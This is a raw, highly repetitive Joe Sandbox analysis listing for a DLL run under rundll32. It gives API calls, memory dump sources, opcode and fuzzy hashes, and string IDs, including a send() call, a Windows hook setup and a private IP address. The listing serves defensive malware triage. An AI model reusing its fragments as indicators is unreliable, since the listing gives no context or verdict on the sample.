                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LongMenuWindow$AppendSystem
                                                                                                                                                            • String ID: 192.168.3.85$Message
                                                                                                                                                            • API String ID: 4121476972-856608562
                                                                                                                                                            • Opcode ID: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                                                            • Instruction ID: 340d0da2b4c657a0b825359f55c53a9166b08011863532f0c2811cf24d97780a
                                                                                                                                                            • Opcode Fuzzy Hash: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                                                            • Instruction Fuzzy Hash: F2411B74A4020A9BDB04DB94CCA2FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                                                              • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                                                              • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                                                              • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                                            • _strcat.LIBCMT ref: 1001310A
                                                                                                                                                              • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                                                            • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                                                            • String ID: :
                                                                                                                                                            • API String ID: 16450322-3653984579
                                                                                                                                                            • Opcode ID: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                                                            • Instruction ID: f6b77999ec19404b7b7ce6cfec7bf3295ff1974a42ab232d1976716b8ec2d843
                                                                                                                                                            • Opcode Fuzzy Hash: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                                                            • Instruction Fuzzy Hash: 01410DB59001189FDB24DB64CC91BEEB775FF44304F5082ADE51AA7282DF346A85CF54
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                                                              • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                                                              • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                                                              • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                                                              • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                                                            • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                                            • API String ID: 3274081130-63838506
                                                                                                                                                            • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                                                            • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                                                            • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                                                            • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                                                            • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                                                            • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                                                            • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                                                            • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                            • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                                                            • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                                                            • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                                                            • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2459298410-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 365290523-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Rect$DesktopVisible
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1055025324-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • _memset.LIBCMT ref: 1002C6E7
                                                                                                                                                              • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                                                            • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 26245289-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                                                            • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3058430110-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • GetDC.USER32(?), ref: 1002658E
                                                                                                                                                            • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                                                            • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3511876931-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                             • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                             • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                             • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                             • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                             • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __msize_malloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1288803200-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                                                            • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                                                            • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessagePeek$H_prolog3
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3998274959-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                                                              • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                                                              • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                                                            • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1532457625-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                                                              • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                                                            • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                                                            • _strtol.LIBCMT ref: 10022CB5
                                                                                                                                                            • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                                                              • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4211061542-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ArrayDestroyFreeSafeTask
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3253174383-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2161412305-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                                                              • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                                                            • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                                                              • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                                                            • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1615547351-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1078018258-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                                                              • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                                                            • __strdup.LIBCMT ref: 1001514C
                                                                                                                                                            • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
